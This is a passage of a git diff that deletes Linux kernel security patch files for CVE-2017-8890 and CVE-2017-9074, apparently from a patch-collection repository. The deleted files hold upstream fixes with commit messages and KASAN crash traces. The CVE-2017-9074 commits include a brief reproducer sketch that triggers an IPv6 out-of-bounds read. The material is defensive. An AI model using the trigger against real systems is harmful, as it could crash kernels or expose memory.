- newicsk->icsk_retransmits = 0;
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch
deleted file mode 100644
index f2e74280..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From f52d6739f6a67cf1c918a4557e88b519b9135930 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Tue, 09 May 2017 06:29:19 -0700
-Subject: [PATCH] dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Change-Id: I2eac7b825a5b597af14a0573b76b685131c46726
-Signed-off-by: Eric Dumazet
-Reported-by: Pray3r
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Signed-off-by: David S. Miller
----
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index fb10d58..325edfe 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -618,6 +618,8 @@
- inet_sk(newsk)->inet_sport = inet_rsk(req)->loc_port;
- newsk->sk_write_space = sk_stream_write_space;
-
-+ inet_sk(newsk)->mc_list = NULL;
-+
- newsk->sk_mark = inet_rsk(req)->ir_mark;
-
- newicsk->icsk_retransmits = 0;
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64
deleted file mode 100644
index 8f12cd9d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch b/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch
deleted file mode 100644
index 5a46f955..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8890/^4.11/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 657831ffc38e30092a2d5f03d385d710eb88b09a Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Tue, 9 May 2017 06:29:19 -0700
-Subject: dccp/tcp: do not inherit mc_list from parent
-
-syzkaller found a way to trigger double frees from ip_mc_drop_socket()
-
-It turns out that leave a copy of parent mc_list at accept() time,
-which is very bad.
-
-Very similar to commit 8b485ce69876 ("tcp: do not inherit
-fastopen_req from parent")
-
-Initial report from Pray3r, completed by Andrey one.
-Thanks a lot to them !
-
-Signed-off-by: Eric Dumazet
-Reported-by: Pray3r
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-Signed-off-by: David S. Miller
----
- net/ipv4/inet_connection_sock.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
-index 5e313c1..1054d33 100644
---- a/net/ipv4/inet_connection_sock.c
-+++ b/net/ipv4/inet_connection_sock.c
-@@ -794,6 +794,8 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
- /* listeners have SOCK_RCU_FREE, not the children */
- sock_reset_flag(newsk, SOCK_RCU_FREE);
-
-+ inet_sk(newsk)->mc_list = NULL;
-+
- newsk->sk_mark = inet_rsk(req)->ir_mark;
- atomic64_set(&newsk->sk_cookie,
- atomic64_read(&inet_rsk(req)->ir_cookie));
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch
deleted file mode 100644
index b95d9264..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0001.patch
+++ /dev/null
@@ -1,229 +0,0 @@ -From ad8a4d9d3f255a783d534a47d4b4ac611bb291d8 Mon Sep 17 00:00:00 2001 -From: Craig Gallek -Date: Tue, 16 May 2017 14:36:23 -0400 -Subject: ipv6: Prevent overrun when parsing v6 header options - -commit 2423496af35d94a87156b063ea5cedffc10a70a1 upstream. - -The KASAN warning repoted below was discovered with a syzkaller -program. The reproducer is basically: - int s = socket(AF_INET6, SOCK_RAW, NEXTHDR_HOP); - send(s, &one_byte_of_data, 1, MSG_MORE); - send(s, &more_than_mtu_bytes_data, 2000, 0); - -The socket() call sets the nexthdr field of the v6 header to -NEXTHDR_HOP, the first send call primes the payload with a non zero -byte of data, and the second send call triggers the fragmentation path. - -The fragmentation code tries to parse the header options in order -to figure out where to insert the fragment option. Since nexthdr points -to an invalid option, the calculation of the size of the network header -can made to be much larger than the linear section of the skb and data -is read outside of it. - -This fix makes ip6_find_1stfrag return an error if it detects -running out-of-bounds. - -[ 42.361487] ================================================================== -[ 42.364412] BUG: KASAN: slab-out-of-bounds in ip6_fragment+0x11c8/0x3730 -[ 42.365471] Read of size 840 at addr ffff88000969e798 by task ip6_fragment-oo/3789 -[ 42.366469] -[ 42.366696] CPU: 1 PID: 3789 Comm: ip6_fragment-oo Not tainted 4.11.0+ #41 -[ 42.367628] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014 -[ 42.368824] Call Trace: -[ 42.369183] dump_stack+0xb3/0x10b -[ 42.369664] print_address_description+0x73/0x290 -[ 42.370325] kasan_report+0x252/0x370 -[ 42.370839] ? ip6_fragment+0x11c8/0x3730 -[ 42.371396] check_memory_region+0x13c/0x1a0 -[ 42.371978] memcpy+0x23/0x50 -[ 42.372395] ip6_fragment+0x11c8/0x3730 -[ 42.372920] ? nf_ct_expect_unregister_notifier+0x110/0x110 -[ 42.373681] ? ip6_copy_metadata+0x7f0/0x7f0 -[ 42.374263] ? 
ip6_forward+0x2e30/0x2e30 -[ 42.374803] ip6_finish_output+0x584/0x990 -[ 42.375350] ip6_output+0x1b7/0x690 -[ 42.375836] ? ip6_finish_output+0x990/0x990 -[ 42.376411] ? ip6_fragment+0x3730/0x3730 -[ 42.376968] ip6_local_out+0x95/0x160 -[ 42.377471] ip6_send_skb+0xa1/0x330 -[ 42.377969] ip6_push_pending_frames+0xb3/0xe0 -[ 42.378589] rawv6_sendmsg+0x2051/0x2db0 -[ 42.379129] ? rawv6_bind+0x8b0/0x8b0 -[ 42.379633] ? _copy_from_user+0x84/0xe0 -[ 42.380193] ? debug_check_no_locks_freed+0x290/0x290 -[ 42.380878] ? ___sys_sendmsg+0x162/0x930 -[ 42.381427] ? rcu_read_lock_sched_held+0xa3/0x120 -[ 42.382074] ? sock_has_perm+0x1f6/0x290 -[ 42.382614] ? ___sys_sendmsg+0x167/0x930 -[ 42.383173] ? lock_downgrade+0x660/0x660 -[ 42.383727] inet_sendmsg+0x123/0x500 -[ 42.384226] ? inet_sendmsg+0x123/0x500 -[ 42.384748] ? inet_recvmsg+0x540/0x540 -[ 42.385263] sock_sendmsg+0xca/0x110 -[ 42.385758] SYSC_sendto+0x217/0x380 -[ 42.386249] ? SYSC_connect+0x310/0x310 -[ 42.386783] ? __might_fault+0x110/0x1d0 -[ 42.387324] ? lock_downgrade+0x660/0x660 -[ 42.387880] ? __fget_light+0xa1/0x1f0 -[ 42.388403] ? __fdget+0x18/0x20 -[ 42.388851] ? sock_common_setsockopt+0x95/0xd0 -[ 42.389472] ? SyS_setsockopt+0x17f/0x260 -[ 42.390021] ? 
entry_SYSCALL_64_fastpath+0x5/0xbe -[ 42.390650] SyS_sendto+0x40/0x50 -[ 42.391103] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.391731] RIP: 0033:0x7fbbb711e383 -[ 42.392217] RSP: 002b:00007ffff4d34f28 EFLAGS: 00000246 ORIG_RAX: 000000000000002c -[ 42.393235] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbbb711e383 -[ 42.394195] RDX: 0000000000001000 RSI: 00007ffff4d34f60 RDI: 0000000000000003 -[ 42.395145] RBP: 0000000000000046 R08: 00007ffff4d34f40 R09: 0000000000000018 -[ 42.396056] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400aad -[ 42.396598] R13: 0000000000000066 R14: 00007ffff4d34ee0 R15: 00007fbbb717af00 -[ 42.397257] -[ 42.397411] Allocated by task 3789: -[ 42.397702] save_stack_trace+0x16/0x20 -[ 42.398005] save_stack+0x46/0xd0 -[ 42.398267] kasan_kmalloc+0xad/0xe0 -[ 42.398548] kasan_slab_alloc+0x12/0x20 -[ 42.398848] __kmalloc_node_track_caller+0xcb/0x380 -[ 42.399224] __kmalloc_reserve.isra.32+0x41/0xe0 -[ 42.399654] __alloc_skb+0xf8/0x580 -[ 42.400003] sock_wmalloc+0xab/0xf0 -[ 42.400346] __ip6_append_data.isra.41+0x2472/0x33d0 -[ 42.400813] ip6_append_data+0x1a8/0x2f0 -[ 42.401122] rawv6_sendmsg+0x11ee/0x2db0 -[ 42.401505] inet_sendmsg+0x123/0x500 -[ 42.401860] sock_sendmsg+0xca/0x110 -[ 42.402209] ___sys_sendmsg+0x7cb/0x930 -[ 42.402582] __sys_sendmsg+0xd9/0x190 -[ 42.402941] SyS_sendmsg+0x2d/0x50 -[ 42.403273] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.403718] -[ 42.403871] Freed by task 1794: -[ 42.404146] save_stack_trace+0x16/0x20 -[ 42.404515] save_stack+0x46/0xd0 -[ 42.404827] kasan_slab_free+0x72/0xc0 -[ 42.405167] kfree+0xe8/0x2b0 -[ 42.405462] skb_free_head+0x74/0xb0 -[ 42.405806] skb_release_data+0x30e/0x3a0 -[ 42.406198] skb_release_all+0x4a/0x60 -[ 42.406563] consume_skb+0x113/0x2e0 -[ 42.406910] skb_free_datagram+0x1a/0xe0 -[ 42.407288] netlink_recvmsg+0x60d/0xe40 -[ 42.407667] sock_recvmsg+0xd7/0x110 -[ 42.408022] ___sys_recvmsg+0x25c/0x580 -[ 42.408395] __sys_recvmsg+0xd6/0x190 -[ 42.408753] 
SyS_recvmsg+0x2d/0x50 -[ 42.409086] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.409513] -[ 42.409665] The buggy address belongs to the object at ffff88000969e780 -[ 42.409665] which belongs to the cache kmalloc-512 of size 512 -[ 42.410846] The buggy address is located 24 bytes inside of -[ 42.410846] 512-byte region [ffff88000969e780, ffff88000969e980) -[ 42.411941] The buggy address belongs to the page: -[ 42.412405] page:ffffea000025a780 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0 -[ 42.413298] flags: 0x100000000008100(slab|head) -[ 42.413729] raw: 0100000000008100 0000000000000000 0000000000000000 00000001800c000c -[ 42.414387] raw: ffffea00002a9500 0000000900000007 ffff88000c401280 0000000000000000 -[ 42.415074] page dumped because: kasan: bad access detected -[ 42.415604] -[ 42.415757] Memory state around the buggy address: -[ 42.416222] ffff88000969e880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -[ 42.416904] ffff88000969e900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -[ 42.417591] >ffff88000969e980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[ 42.418273] ^ -[ 42.418588] ffff88000969ea00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb -[ 42.419273] ffff88000969ea80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb -[ 42.419882] ================================================================== - -Reported-by: Andrey Konovalov -Signed-off-by: Craig Gallek -Signed-off-by: David S. 
Miller -[bwh: Backported to 3.2: adjust filenames, context] -Signed-off-by: Ben Hutchings ---- - net/ipv6/af_inet6.c | 2 ++ - net/ipv6/ip6_output.c | 18 ++++++++++++------ - net/ipv6/udp.c | 2 ++ - 3 files changed, 16 insertions(+), 6 deletions(-) - -diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c -index 8657823..914c7d5 100644 ---- a/net/ipv6/af_inet6.c -+++ b/net/ipv6/af_inet6.c -@@ -825,6 +825,8 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features) - sizeof(*ipv6h)); - if (proto == IPPROTO_UDP) { - unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (unfrag_ip6hlen < 0) -+ return ERR_PTR(unfrag_ip6hlen); - fptr = (struct frag_hdr *)(skb_network_header(skb) + - unfrag_ip6hlen); - fptr->frag_off = htons(offset); -diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c -index c59f646..dd31060 100644 ---- a/net/ipv6/ip6_output.c -+++ b/net/ipv6/ip6_output.c -@@ -562,13 +562,12 @@ static void ip6_copy_metadata(struct sk_buff *to, struct sk_buff *from) - int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr) - { - u16 offset = sizeof(struct ipv6hdr); -- struct ipv6_opt_hdr *exthdr = -- (struct ipv6_opt_hdr *)(ipv6_hdr(skb) + 1); - unsigned int packet_len = skb->tail - skb->network_header; - int found_rhdr = 0; - *nexthdr = &ipv6_hdr(skb)->nexthdr; - -- while (offset + 1 <= packet_len) { -+ while (offset <= packet_len) { -+ struct ipv6_opt_hdr *exthdr; - - switch (**nexthdr) { - -@@ -589,13 +588,16 @@ int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr) - return offset; - } - -- offset += ipv6_optlen(exthdr); -- *nexthdr = &exthdr->nexthdr; -+ if (offset + sizeof(struct ipv6_opt_hdr) > packet_len) -+ return -EINVAL; -+ - exthdr = (struct ipv6_opt_hdr *)(skb_network_header(skb) + - offset); -+ offset += ipv6_optlen(exthdr); -+ *nexthdr = &exthdr->nexthdr; - } - -- return offset; -+ return -EINVAL; - } - - void ipv6_select_ident(struct frag_hdr *fhdr, struct rt6_info *rt) -@@ -630,6 +632,10 @@ int ip6_fragment(struct 
sk_buff *skb, int (*output)(struct sk_buff *)) - struct net *net = dev_net(skb_dst(skb)->dev); - - hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (hlen < 0) { -+ err = hlen; -+ goto fail; -+ } - nexthdr = *prevhdr; - - mtu = ip6_skb_dst_mtu(skb); -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 03a7ed1..8157ae0 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -1353,6 +1353,8 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features) - * bytes to insert fragment header. - */ - unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (unfrag_ip6hlen < 0) -+ return ERR_PTR(unfrag_ip6hlen); - nexthdr = *prevhdr; - *prevhdr = NEXTHDR_FRAGMENT; - unfrag_len = skb_network_header(skb) - skb_mac_header(skb) + --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch deleted file mode 100644 index 7a5f14cb..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch +++ /dev/null 
@@ -1,97 +0,0 @@ -From f7c2d2d7ebf9a110cafbe53199457c318f61a192 Mon Sep 17 00:00:00 2001 -From: "David S. Miller" -Date: Wed, 17 May 2017 22:54:11 -0400 -Subject: ipv6: Check ip6_find_1stfragopt() return value properly. - -commit 7dd7eb9513bd02184d45f000ab69d78cb1fa1531 upstream. - -Do not use unsigned variables to see if it returns a negative -error or not. - -Fixes: 2423496af35d ("ipv6: Prevent overrun when parsing v6 header options") -Reported-by: Julia Lawall -Signed-off-by: David S. Miller -[bwh: Backported to 3.2: adjust filenames, context] -Signed-off-by: Ben Hutchings ---- - net/ipv6/af_inet6.c | 9 ++++----- - net/ipv6/ip6_output.c | 7 +++---- - net/ipv6/udp.c | 8 +++++--- - 3 files changed, 12 insertions(+), 12 deletions(-) - -diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c -index 914c7d5..b0e4fb8 100644 ---- a/net/ipv6/af_inet6.c -+++ b/net/ipv6/af_inet6.c -@@ -785,7 +785,6 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features) - const struct inet6_protocol *ops; - int proto; - struct frag_hdr *fptr; -- unsigned int unfrag_ip6hlen; - u8 *prevhdr; - int offset = 0; - -@@ -824,11 +823,11 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features) - ipv6h->payload_len = htons(skb->len - skb->mac_len - - sizeof(*ipv6h)); - if (proto == IPPROTO_UDP) { -- unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -- if (unfrag_ip6hlen < 0) -- return ERR_PTR(unfrag_ip6hlen); -+ int err = ip6_find_1stfragopt(skb, &prevhdr); -+ if (err < 0) -+ return ERR_PTR(err); - fptr = (struct frag_hdr *)(skb_network_header(skb) + -- unfrag_ip6hlen); -+ err); - fptr->frag_off = htons(offset); - if (skb->next != NULL) - fptr->frag_off |= htons(IP6_MF); -diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c -index dd31060..81a7803 100644 ---- a/net/ipv6/ip6_output.c -+++ b/net/ipv6/ip6_output.c -@@ -631,11 +631,10 @@ int ip6_fragment(struct sk_buff *skb, int (*output)(struct sk_buff *)) - u8 *prevhdr, nexthdr = 0; - struct net *net 
= dev_net(skb_dst(skb)->dev); - -- hlen = ip6_find_1stfragopt(skb, &prevhdr); -- if (hlen < 0) { -- err = hlen; -+ err = ip6_find_1stfragopt(skb, &prevhdr); -+ if (err < 0) - goto fail; -- } -+ hlen = err; - nexthdr = *prevhdr; - - mtu = ip6_skb_dst_mtu(skb); -diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c -index 8157ae0..5f0d519 100644 ---- a/net/ipv6/udp.c -+++ b/net/ipv6/udp.c -@@ -1316,6 +1316,7 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features) - u8 frag_hdr_sz = sizeof(struct frag_hdr); - int offset; - __wsum csum; -+ int err; - - mss = skb_shinfo(skb)->gso_size; - if (unlikely(skb->len <= mss)) -@@ -1352,9 +1353,10 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features) - /* Find the unfragmentable header and shift it left by frag_hdr_sz - * bytes to insert fragment header. - */ -- unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -- if (unfrag_ip6hlen < 0) -- return ERR_PTR(unfrag_ip6hlen); -+ err = ip6_find_1stfragopt(skb, &prevhdr); -+ if (err < 0) -+ return ERR_PTR(err); -+ unfrag_ip6hlen = err; - nexthdr = *prevhdr; - *prevhdr = NEXTHDR_FRAGMENT; - unfrag_len = skb_network_header(skb) - skb_mac_header(skb) + --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch b/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch deleted file mode 100644 index b4c2bb80..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch +++ /dev/null 
@@ -1,231 +0,0 @@ -From 2423496af35d94a87156b063ea5cedffc10a70a1 Mon Sep 17 00:00:00 2001 -From: Craig Gallek -Date: Tue, 16 May 2017 14:36:23 -0400 -Subject: ipv6: Prevent overrun when parsing v6 header options - -The KASAN warning repoted below was discovered with a syzkaller -program. The reproducer is basically: - int s = socket(AF_INET6, SOCK_RAW, NEXTHDR_HOP); - send(s, &one_byte_of_data, 1, MSG_MORE); - send(s, &more_than_mtu_bytes_data, 2000, 0); - -The socket() call sets the nexthdr field of the v6 header to -NEXTHDR_HOP, the first send call primes the payload with a non zero -byte of data, and the second send call triggers the fragmentation path. - -The fragmentation code tries to parse the header options in order -to figure out where to insert the fragment option. Since nexthdr points -to an invalid option, the calculation of the size of the network header -can made to be much larger than the linear section of the skb and data -is read outside of it. - -This fix makes ip6_find_1stfrag return an error if it detects -running out-of-bounds. - -[ 42.361487] ================================================================== -[ 42.364412] BUG: KASAN: slab-out-of-bounds in ip6_fragment+0x11c8/0x3730 -[ 42.365471] Read of size 840 at addr ffff88000969e798 by task ip6_fragment-oo/3789 -[ 42.366469] -[ 42.366696] CPU: 1 PID: 3789 Comm: ip6_fragment-oo Not tainted 4.11.0+ #41 -[ 42.367628] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014 -[ 42.368824] Call Trace: -[ 42.369183] dump_stack+0xb3/0x10b -[ 42.369664] print_address_description+0x73/0x290 -[ 42.370325] kasan_report+0x252/0x370 -[ 42.370839] ? ip6_fragment+0x11c8/0x3730 -[ 42.371396] check_memory_region+0x13c/0x1a0 -[ 42.371978] memcpy+0x23/0x50 -[ 42.372395] ip6_fragment+0x11c8/0x3730 -[ 42.372920] ? nf_ct_expect_unregister_notifier+0x110/0x110 -[ 42.373681] ? ip6_copy_metadata+0x7f0/0x7f0 -[ 42.374263] ? 
ip6_forward+0x2e30/0x2e30 -[ 42.374803] ip6_finish_output+0x584/0x990 -[ 42.375350] ip6_output+0x1b7/0x690 -[ 42.375836] ? ip6_finish_output+0x990/0x990 -[ 42.376411] ? ip6_fragment+0x3730/0x3730 -[ 42.376968] ip6_local_out+0x95/0x160 -[ 42.377471] ip6_send_skb+0xa1/0x330 -[ 42.377969] ip6_push_pending_frames+0xb3/0xe0 -[ 42.378589] rawv6_sendmsg+0x2051/0x2db0 -[ 42.379129] ? rawv6_bind+0x8b0/0x8b0 -[ 42.379633] ? _copy_from_user+0x84/0xe0 -[ 42.380193] ? debug_check_no_locks_freed+0x290/0x290 -[ 42.380878] ? ___sys_sendmsg+0x162/0x930 -[ 42.381427] ? rcu_read_lock_sched_held+0xa3/0x120 -[ 42.382074] ? sock_has_perm+0x1f6/0x290 -[ 42.382614] ? ___sys_sendmsg+0x167/0x930 -[ 42.383173] ? lock_downgrade+0x660/0x660 -[ 42.383727] inet_sendmsg+0x123/0x500 -[ 42.384226] ? inet_sendmsg+0x123/0x500 -[ 42.384748] ? inet_recvmsg+0x540/0x540 -[ 42.385263] sock_sendmsg+0xca/0x110 -[ 42.385758] SYSC_sendto+0x217/0x380 -[ 42.386249] ? SYSC_connect+0x310/0x310 -[ 42.386783] ? __might_fault+0x110/0x1d0 -[ 42.387324] ? lock_downgrade+0x660/0x660 -[ 42.387880] ? __fget_light+0xa1/0x1f0 -[ 42.388403] ? __fdget+0x18/0x20 -[ 42.388851] ? sock_common_setsockopt+0x95/0xd0 -[ 42.389472] ? SyS_setsockopt+0x17f/0x260 -[ 42.390021] ? 
entry_SYSCALL_64_fastpath+0x5/0xbe -[ 42.390650] SyS_sendto+0x40/0x50 -[ 42.391103] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.391731] RIP: 0033:0x7fbbb711e383 -[ 42.392217] RSP: 002b:00007ffff4d34f28 EFLAGS: 00000246 ORIG_RAX: 000000000000002c -[ 42.393235] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbbb711e383 -[ 42.394195] RDX: 0000000000001000 RSI: 00007ffff4d34f60 RDI: 0000000000000003 -[ 42.395145] RBP: 0000000000000046 R08: 00007ffff4d34f40 R09: 0000000000000018 -[ 42.396056] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400aad -[ 42.396598] R13: 0000000000000066 R14: 00007ffff4d34ee0 R15: 00007fbbb717af00 -[ 42.397257] -[ 42.397411] Allocated by task 3789: -[ 42.397702] save_stack_trace+0x16/0x20 -[ 42.398005] save_stack+0x46/0xd0 -[ 42.398267] kasan_kmalloc+0xad/0xe0 -[ 42.398548] kasan_slab_alloc+0x12/0x20 -[ 42.398848] __kmalloc_node_track_caller+0xcb/0x380 -[ 42.399224] __kmalloc_reserve.isra.32+0x41/0xe0 -[ 42.399654] __alloc_skb+0xf8/0x580 -[ 42.400003] sock_wmalloc+0xab/0xf0 -[ 42.400346] __ip6_append_data.isra.41+0x2472/0x33d0 -[ 42.400813] ip6_append_data+0x1a8/0x2f0 -[ 42.401122] rawv6_sendmsg+0x11ee/0x2db0 -[ 42.401505] inet_sendmsg+0x123/0x500 -[ 42.401860] sock_sendmsg+0xca/0x110 -[ 42.402209] ___sys_sendmsg+0x7cb/0x930 -[ 42.402582] __sys_sendmsg+0xd9/0x190 -[ 42.402941] SyS_sendmsg+0x2d/0x50 -[ 42.403273] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.403718] -[ 42.403871] Freed by task 1794: -[ 42.404146] save_stack_trace+0x16/0x20 -[ 42.404515] save_stack+0x46/0xd0 -[ 42.404827] kasan_slab_free+0x72/0xc0 -[ 42.405167] kfree+0xe8/0x2b0 -[ 42.405462] skb_free_head+0x74/0xb0 -[ 42.405806] skb_release_data+0x30e/0x3a0 -[ 42.406198] skb_release_all+0x4a/0x60 -[ 42.406563] consume_skb+0x113/0x2e0 -[ 42.406910] skb_free_datagram+0x1a/0xe0 -[ 42.407288] netlink_recvmsg+0x60d/0xe40 -[ 42.407667] sock_recvmsg+0xd7/0x110 -[ 42.408022] ___sys_recvmsg+0x25c/0x580 -[ 42.408395] __sys_recvmsg+0xd6/0x190 -[ 42.408753] 
SyS_recvmsg+0x2d/0x50 -[ 42.409086] entry_SYSCALL_64_fastpath+0x1f/0xbe -[ 42.409513] -[ 42.409665] The buggy address belongs to the object at ffff88000969e780 -[ 42.409665] which belongs to the cache kmalloc-512 of size 512 -[ 42.410846] The buggy address is located 24 bytes inside of -[ 42.410846] 512-byte region [ffff88000969e780, ffff88000969e980) -[ 42.411941] The buggy address belongs to the page: -[ 42.412405] page:ffffea000025a780 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0 -[ 42.413298] flags: 0x100000000008100(slab|head) -[ 42.413729] raw: 0100000000008100 0000000000000000 0000000000000000 00000001800c000c -[ 42.414387] raw: ffffea00002a9500 0000000900000007 ffff88000c401280 0000000000000000 -[ 42.415074] page dumped because: kasan: bad access detected -[ 42.415604] -[ 42.415757] Memory state around the buggy address: -[ 42.416222] ffff88000969e880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -[ 42.416904] ffff88000969e900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -[ 42.417591] >ffff88000969e980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[ 42.418273] ^ -[ 42.418588] ffff88000969ea00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb -[ 42.419273] ffff88000969ea80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb -[ 42.419882] ================================================================== - -Reported-by: Andrey Konovalov -Signed-off-by: Craig Gallek -Signed-off-by: David S. 
Miller ---- - net/ipv6/ip6_offload.c | 2 ++ - net/ipv6/ip6_output.c | 4 ++++ - net/ipv6/output_core.c | 14 ++++++++------ - net/ipv6/udp_offload.c | 2 ++ - 4 files changed, 16 insertions(+), 6 deletions(-) - -diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c -index 93e58a5..eab36ab 100644 ---- a/net/ipv6/ip6_offload.c -+++ b/net/ipv6/ip6_offload.c -@@ -117,6 +117,8 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, - - if (udpfrag) { - unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (unfrag_ip6hlen < 0) -+ return ERR_PTR(unfrag_ip6hlen); - fptr = (struct frag_hdr *)((u8 *)ipv6h + unfrag_ip6hlen); - fptr->frag_off = htons(offset); - if (skb->next) -diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c -index 58f6288..01deecd 100644 ---- a/net/ipv6/ip6_output.c -+++ b/net/ipv6/ip6_output.c -@@ -598,6 +598,10 @@ int ip6_fragment(struct net *net, struct sock *sk, struct sk_buff *skb, - u8 *prevhdr, nexthdr = 0; - - hlen = ip6_find_1stfragopt(skb, &prevhdr); -+ if (hlen < 0) { -+ err = hlen; -+ goto fail; -+ } - nexthdr = *prevhdr; - - mtu = ip6_skb_dst_mtu(skb); -diff --git a/net/ipv6/output_core.c b/net/ipv6/output_core.c -index cd42523..e9065b8 100644 ---- a/net/ipv6/output_core.c -+++ b/net/ipv6/output_core.c -@@ -79,14 +79,13 @@ EXPORT_SYMBOL(ipv6_select_ident); - int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr) - { - u16 offset = sizeof(struct ipv6hdr); -- struct ipv6_opt_hdr *exthdr = -- (struct ipv6_opt_hdr *)(ipv6_hdr(skb) + 1); - unsigned int packet_len = skb_tail_pointer(skb) - - skb_network_header(skb); - int found_rhdr = 0; - *nexthdr = &ipv6_hdr(skb)->nexthdr; - -- while (offset + 1 <= packet_len) { -+ while (offset <= packet_len) { -+ struct ipv6_opt_hdr *exthdr; - - switch (**nexthdr) { - -@@ -107,13 +106,16 @@ int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr) - return offset; - } - -- offset += ipv6_optlen(exthdr); -- *nexthdr = &exthdr->nexthdr; -+ if (offset + sizeof(struct ipv6_opt_hdr) > 
